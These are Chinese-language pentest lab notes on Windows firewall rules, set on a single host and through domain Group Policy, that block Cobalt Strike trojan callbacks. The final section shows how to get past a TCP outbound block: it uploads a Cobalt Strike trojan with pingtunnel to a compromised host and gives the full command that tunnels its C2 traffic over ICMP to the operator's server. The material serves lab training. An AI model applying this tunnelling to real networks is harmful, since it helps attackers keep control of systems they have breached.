一.单机-防火墙-限制端口出入站-熟悉常见主机配置不出网的方式

配置防火墙属性

1.win10虚拟机本地搭建一个网站，配置防火墙属性的入站连接为默认值。

局域网中另一台主机能正常访问

2.入站连接设置为 阻止所有连接 。

因为是我们去访问他的网站，所以是入站。

无法在访问成功

配置出入站规则

正向连接&反向连接

reverse监听反向：上传的后门会主动连接我们控制的服务器对于目标防火墙中属于出站规则

bind监听正向：我们控制的服务器主动去连接目标服务器对于目标防火墙中属于入站规则

1.cs生成exe木马

上传到win10虚拟机，能正常上线

2.因为使用的是reverse监听器方式，所以是出站，使用的是9527端口。在win10虚拟机配置出站规则

新建规则——直接禁止了9527端口的连接

再次执行cs木马程序，程序无法执行，cs无法上线

二.单机-防火墙-限制协议出入站-熟悉常见主机配置不出网的方式

配置协议

新建规则——将规则应用于tcp协议和所有端口

配置完成后，不管cs或者msf更换任何端口都无法在上线

三.域控-防火墙-组策略对象同步-熟悉常见主机配置不出网的操作流程

1.查看一台域内主机的防火墙状态，域和专用网络是开启状态，公用网络关闭状态

2.登录域控制器，操作：开始-管理工具-组策略管理-域-创建GPO链接

创建名称为 fhq

3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性

4.我们配置为：域——启用    专用和公用——关闭

5.限制协议：在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字：TCP协议控制

6.如何让域控制器的配置在域成员主机生效？

生效策略：强制&命令&重启

命令：

来到域内主机，命令行执行命令：gpupdate/force

再次查看防火墙状态，发现变成了域控制器上的配置

强制：强制生效

回到组策略管理——fhq右键——强制

来到出站规则，可以看到TCP协议控制同样生效

配置完成后，ping www.baidu.com能ping通，网络没问题。但是浏览器访问不了，就是因为禁用了TCP协议。ping走的是ICMP协议。

四.隧道技术

如果目标主机的出站规则中TCP协议被封杀，入站规则没有封杀，有互联网网络。该怎么上线？

1.正向连接：取得一台有网络能和目标主机通讯的服务器权限

2.隧道技术：走其他协议出网即可

隧道技术

前提：已获取一台域用户主机的管理员权限

1.本机启动cs，新建两个监听器，分别为127.0.0.1:5555和本机ipv4地址:6666

2.生成exe程序木马

3.启动pingtunnel工具

下载:https://github.com/esrrhs/pingtunnel

4.将exe程序木马和pingtunnel.exe工具上传到域用户主机

使用管理员用户启动命令行，执行如下：

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.172.249 -t 192.168.172.249:6666 -tcp 1 -noprint 1 -nolog 1

5.运行exe木马，cs成功上线

如果目标主机没有互联网网络怎么办？

正向连接：取得一台有网络能和目标主机通讯的服务器权限。将服务器当做跳板，把数据给出网的服务器，通过出网服务器正向连接控制目标主机